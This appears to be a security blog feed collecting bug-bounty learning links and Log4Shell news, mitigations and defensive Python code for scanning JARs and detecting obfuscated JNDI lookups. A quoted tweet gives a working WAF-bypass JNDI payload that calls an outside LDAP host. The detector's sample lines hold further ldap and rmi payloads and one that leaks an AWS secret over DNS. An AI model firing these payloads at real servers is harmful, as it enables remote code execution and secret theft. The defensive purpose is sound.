https://xvnpw.github.io/
xvnpw personal blog with posts about hacking, bug bounty, appsec
Message from one of discord chat:
How to get started with hacking and bug bounties?
We've gathered some useful resources to get you started on your bug bounty journey!
- Guide to learn hacking https://www.youtube.com/watch?v=2TofunAI6fU
- Finding your first bug: bounty hunting tips from the Burp Suite community https://portswigger.net/blog/finding-your-first-bug-bounty-hunting-tips-from-the-burp-suite-community
- PortSwigger Web Security Academy https://portswigger.net/web-security/learning-path
- Nahamsec's Twitch https://www.twitch.tv/nahamsec
- Nahamsec interviews with top bug bounty hunters https://www.youtube.com/c/Nahamsec
- Nahamsec's beginner repo https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters
- Stök https://www.youtube.com/c/STOKfredrik
- InsiderPhD https://www.youtube.com/c/InsiderPhD
- Series for new bug hunters https://www.youtube.com/playlist?list=PLbyncTkpno5FAC0DJYuJrEqHSMdudEffw
- Jhaddix https://www.youtube.com/c/jhaddix
- Posts from Hacker101 members on how to get started hacking
- zonduu https://medium.com/@zonduu/bug-bounty-beginners-guide-683e9d567b9f
- p4nda https://enfinlay.github.io/bugbounty/2020/08/15/so-you-wanna-hack.html
- also a blog on subdomain takeovers https://enfinlay.github.io/sto/ip/domain/bugbounty/2020/09/12/ip-server-domain.html
- clos2100 on getting started without a technical background https://twitter.com/pirateducky/status/1300566000665014275
- dee-see's resources for Android Hacking https://blog.deesee.xyz/android/security/2020/01/13/android-application-hacking-resources.html
- hacker101 videos https://www.hacker101.com/videos
YouTube
The Secret step-by-step Guide to learn Hacking
totally clickbait. but also not clickbait. I don't know where to start hacking, there is no guide to learn this stuff. But I hope you still have a plan now!
Get the LiveOverflow Font: https://shop.liveoverflow.com (advertisement)
Checkout: https://live…
Forwarded from Security Wine (formerly DevSecOps Wine) (Denis Yakimov)
Log4j - impacted products
It is time to look at the products that were impacted by log4j:
https://github.com/NCSC-NL/log4shell/tree/main/software
https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592
There is going to be a lot to fix.
#dev #ops #attack
https://youtu.be/voTHFdL9S2k
https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf
YouTube
A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages!
We propose a new exploit technique that brings a whole-new attack surface to bypass SSRF (Server Side Request Forgery) protections. This is a very general attack approach, in which we used in combination with our own fuzzing tool to discover many 0days in…
https://logging.apache.org/log4j/2.x/security.html
Mitigation
Log4j 1.x mitigation: Log4j 1.x does not have Lookups so the risk is lower. Applications using Log4j 1.x are only vulnerable to this attack when they use JNDI in their configuration. A separate CVE (CVE-2021-4104) has been filed for this vulnerability. To mitigate: audit your logging configuration to ensure it has no JMSAppender configured. Log4j 1.x configurations without JMSAppender are not impacted by this vulnerability.
Log4j 2.x mitigation: Implement one of the mitigation techniques below.
- Java 8 (or later) users should upgrade to release 2.16.0.
- Users requiring Java 7 should upgrade to release 2.12.2 when it becomes available (work in progress, expected to be available soon).
- Otherwise, remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
Note that only the log4j-core JAR file is impacted by this vulnerability. Applications using only the log4j-api JAR file without the log4j-core JAR file are not impacted by this vulnerability.
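As an added example (not Apache's code and not part of the quoted advisory): a Python scanner that finds log4j-core JARs still carrying JndiLookup.class, including JARs nested inside a WAR, EAR or fat JAR where the plain zip -q -d command never looks, and that strips the class from a standalone JAR the same way zip -q -d does. The sample tree it scans is constructed in a temporary directory (the jar names and the 2.14.1 version are made up), so it runs offline.

```python
"""Find JARs that still ship JndiLookup.class (also inside WAR/EAR/fat JARs)
and strip it like the quoted 'zip -q -d'. Added example; not Apache's code."""
import io
import os
import shutil
import tempfile
import zipfile
from typing import Dict, List

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")


def _scan_bytes(data: bytes, label: str, findings: List[str]) -> None:
    """Walk one archive held in memory; record label ('outer!inner' for
    nested archives) whenever JndiLookup.class is a top-level entry."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return  # not a zip container: skip
    with zf:
        for name in zf.namelist():
            if name == JNDI_CLASS:
                findings.append(label)
            elif name.lower().endswith(ARCHIVE_SUFFIXES):
                _scan_bytes(zf.read(name), f"{label}!{name}", findings)

def scan_tree(root: str) -> List[str]:
    """Return labels (paths relative to root, '!'-separated when nested)
    of every archive that contains JndiLookup.class."""
    findings: List[str] = []
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            if fn.lower().endswith(ARCHIVE_SUFFIXES):
                full = os.path.join(dirpath, fn)
                with open(full, "rb") as fh:
                    _scan_bytes(fh.read(), os.path.relpath(full, root), findings)
    return findings

def strip_jndi_lookup(jar_path: str) -> bool:
    """Rewrite jar_path without its top-level JndiLookup.class entry
    (what 'zip -q -d' does), keeping a .bak copy for rollback. Returns True
    if the class was present. Archives nested inside a WAR are left alone:
    those must be repackaged from the build."""
    with zipfile.ZipFile(jar_path) as src:
        if JNDI_CLASS not in src.namelist():
            return False
        fd, tmp = tempfile.mkstemp(dir=os.path.dirname(jar_path) or ".", suffix=".tmp")
        os.close(fd)
        with zipfile.ZipFile(tmp, "w") as dst:
            for info in src.infolist():
                if info.filename != JNDI_CLASS:
                    dst.writestr(info, src.read(info.filename))
    shutil.copy2(jar_path, jar_path + ".bak")
    os.replace(tmp, jar_path)
    return True

def _fake_jar(entries: Dict[str, bytes]) -> bytes:
    """Constructed fixture: a zip holding the given entries (fake class bytes)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()

def build_fixture(root: str) -> None:
    """Constructed sample tree (names and versions are made up): a vulnerable
    log4j-core jar, an api-only jar, and a WAR that bundles both."""
    os.makedirs(os.path.join(root, "lib"))
    core = _fake_jar({
        "META-INF/MANIFEST.MF": b"Manifest-Version: 1.0\n",
        "org/apache/logging/log4j/core/Logger.class": b"\xca\xfe\xba\xbe",
        JNDI_CLASS: b"\xca\xfe\xba\xbe",
    })
    api = _fake_jar({"org/apache/logging/log4j/Logger.class": b"\xca\xfe\xba\xbe"})
    war = _fake_jar({"WEB-INF/lib/log4j-core-2.14.1.jar": core,
                     "WEB-INF/lib/log4j-api-2.14.1.jar": api})
    for rel, data in (("lib/log4j-core-2.14.1.jar", core),
                      ("lib/log4j-api-2.14.1.jar", api), ("app.war", war)):
        with open(os.path.join(root, rel), "wb") as fh:
            fh.write(data)

def run_demo() -> dict:
    """Build the fixture in a temp dir, scan, strip the standalone core jar,
    rescan. Returns {'before': [...], 'removed': bool, 'after': [...]}."""
    root = tempfile.mkdtemp(prefix="log4j-scan-")
    try:
        build_fixture(root)
        before = sorted(scan_tree(root))
        removed = strip_jndi_lookup(os.path.join(root, "lib", "log4j-core-2.14.1.jar"))
        after = sorted(scan_tree(root))
        return {"before": before, "removed": removed, "after": after}
    finally:
        shutil.rmtree(root, ignore_errors=True)

if __name__ == "__main__":
    print(run_demo())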
Forwarded from Pentesting News
STEWS.pdf
723.6 KB
Realtime Problems: #Exposing #WebSocket Servers Hidden in Plain Sight
A Security Tool
https://github.com/PalindromeLabs/STEWS
Forwarded from HackGit
Aparoid - Static and dynamic #Android application #security analysis.
Aparoid is a #framework designed for Android application analysis. It offers an automated set of tools to discover vulnerabilities and other risks in mobile applications. It is built using the Flask framework and offers a web GUI to upload APK files and explore the contents/results.
The current version offers the following features:
1. APK decompilation using jadx
2. Vulnerability detection system (rules configurable using the dashboard)
3. Binary file risk analysis
4. Custom features for frameworks like React Native, Flutter and Xamarin
5. Android Manifest security checks
6. Dynamic analysis on all (rooted) Android devices (physical, emulated, and cloud-based)
7. Frida scripts for the bypass of root detection, SSL pinning, and debugger detection (custom scripts are also supported)
8. Automatic installation of a root CA certificate (also supports Burp Suite)
9. HTTP(S) interception proxy and real-time traffic viewer using Kafka
10. Real-time application stored data browser
https://github.com/stefan2200/aparoid
GitHub
GitHub - stefan2200/aparoid: Static and dynamic Android application security analysis
Static and dynamic Android application security analysis - stefan2200/aparoid
Forwarded from LeakInfo
Some threat actors exploiting the Apache #Log4j vulnerability have switched from LDAP callback URLs to RMI, or have even used both at the same time.
So far this trend has been observed among criminals looking to hijack resources for Monero mining.
Most attacks targeting the Log4j vulnerability went through the LDAP (Lightweight Directory Access Protocol) service. Switching to the RMI (Remote Method Invocation) API seems illogical at first.
However, some JVM (Java Virtual Machine) versions do not enforce strict policies, so RMI can be an easier channel for achieving RCE (remote code execution) than LDAP.
Juniper Networks
Log4j Vulnerability: Attackers Shift Focus From LDAP to RMI
Juniper Threat Labs has observed variants of the ongoing Log4j CVE-2021-44228 attacks that use an RMI service instead of LDAP.
https://twitter.com/11xuxx/status/1471826191724257285?t=uud1PH6uYJEnH7H4CQILNg&s=19
Here, by the way, is an example of how AWS WAF gets bypassed, which is why fixes are needed at every possible point of attack.
Twitter
xxux11 ᯲ ̸
Previous AWS WAF bypass is patched.. here is another: ${jnd${123%25ff:-${123%25ff:-i:}}ldap://mydogsbutt.com:1389/o} #bugbountytips #LOG4JDONTRELYONWAF
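The two items above make the same point from opposite sides: attackers vary both the JNDI transport (LDAP, RMI) and the lookup syntax, so a WAF rule on the literal string ${jndi:ldap is the wrong layer to defend at. As an added example (not Juniper's code and not the tweet author's), here is a Python detector that first resolves the lookup string the way Log4j's own substitution would (innermost ${...} first, the ':-' default fallback, the lower/upper lookups) and only then matches on the jndi: prefix and its scheme. The model of Log4j's substitution is my reading of its behaviour, the single URL-decoding pass is an assumption about the application, and the sample log lines are constructed (203.0.113.5 is a documentation address; mydogsbutt.com is the host from the tweet).

```python
"""Normalize Log4j lookup strings the way the logger's own substitution
would (nested ${...}, ':-' defaults, lower/upper lookups), then match the
jndi: prefix. Added example; not Juniper's or the tweet author's code."""
import re
import urllib.parse
from typing import List, Optional, Tuple

LOOKUP_RE = re.compile(r"\$\{([^{}]*)\}")                 # innermost ${...}
JNDI_RE = re.compile(r"jndi:\s*([a-z][\w+.-]*):", re.I)  # jndi:<scheme>:


def _resolve_one(body: str) -> Optional[str]:
    """Resolve one lookup body (the text between ${ and }).
    None means 'leave the lookup in place' (unresolvable, or jndi itself)."""
    key, has_default, default = body.partition(":-")
    prefix, has_colon, arg = key.partition(":")
    if has_colon:
        p = prefix.lower()
        if p == "jndi":
            return None          # keep it visible for the matcher
        if p == "lower":
            return arg.lower()
        if p == "upper":
            return arg.upper()
    # Any other lookup (env:, sys:, date:, unknown or empty names) is modeled
    # as unresolvable: fall back to the default when one is given.
    return default if has_default else None


def normalize(text: str, max_rounds: int = 50) -> str:
    """Assumption: the application URL-decodes the value once (as a servlet
    container does) before logging it. Then resolve inside-out until stable."""
    text = urllib.parse.unquote(text)
    for _ in range(max_rounds):
        changed = False

        def repl(m: "re.Match[str]") -> str:
            nonlocal changed
            resolved = _resolve_one(m.group(1))
            if resolved is None:
                return m.group(0)
            changed = True
            return resolved

        text = LOOKUP_RE.sub(repl, text)
        if not changed:
            break
    return text


def detect(line: str) -> Optional[str]:
    """Return the JNDI scheme (ldap, rmi, dns, ...) if the line carries a
    JNDI lookup after normalization, else None."""
    m = JNDI_RE.search(normalize(line))
    return m.group(1).lower() if m else None


def scan(lines: List[str]) -> List[Tuple[str, str]]:
    """(line, scheme) for every line that triggers."""
    hits = []
    for line in lines:
        scheme = detect(line)
        if scheme:
            hits.append((line, scheme))
    return hits


# Constructed sample log lines (203.0.113.5 is a documentation address;
# mydogsbutt.com is the host from the tweet quoted above).
SAMPLE_LINES = [
    "GET /?x=${jnd${123%25ff:-${123%25ff:-i:}}ldap://mydogsbutt.com:1389/o} HTTP/1.1",
    "User-Agent: ${${lower:J}ndi:rmi://203.0.113.5:1099/Exploit}",
    "X-Api-Version: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://203.0.113.5:1389/a}",
    "Referer: ${jndi:dns://${env:AWS_SECRET_ACCESS_KEY}.203.0.113.5}",
    "msg=${ctx:requestId:-none} status=200",
    "User-Agent: curl/7.79.1",
]

if __name__ == "__main__":
    for line, scheme in scan(SAMPLE_LINES):
        print(f"{scheme:5} {line}")
```

The fourth sample shows why the matcher runs on the normalized text rather than requiring a fully resolved lookup: the env: reference inside the DNS host stays unresolved (in the real JVM it would leak the variable's value in the DNS query), but the jndi:dns: prefix is already visible. The fifth sample is the kind of legitimate ctx: lookup with a default that a naive rule on "${" would flag. Treat this as an analyst's triage filter for logs and proxies, not as a replacement for the upgrade or the JndiLookup removal described above.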
Yet another vulnerability, and the release of version 2.17 to protect against a DoS attack via log4j
https://www.bleepingcomputer.com/news/security/upgraded-to-log4j-216-surprise-theres-a-217-fixing-dos/
BleepingComputer
Upgraded to log4j 2.16? Surprise, there's a 2.17 fixing DoS
Yesterday, BleepingComputer summed up all the log4j and logback CVEs known thus far. Ever since the critical log4j zero-day saga began last week, security experts have time and time again recommended version 2.16 as the safest release to be on. That changes…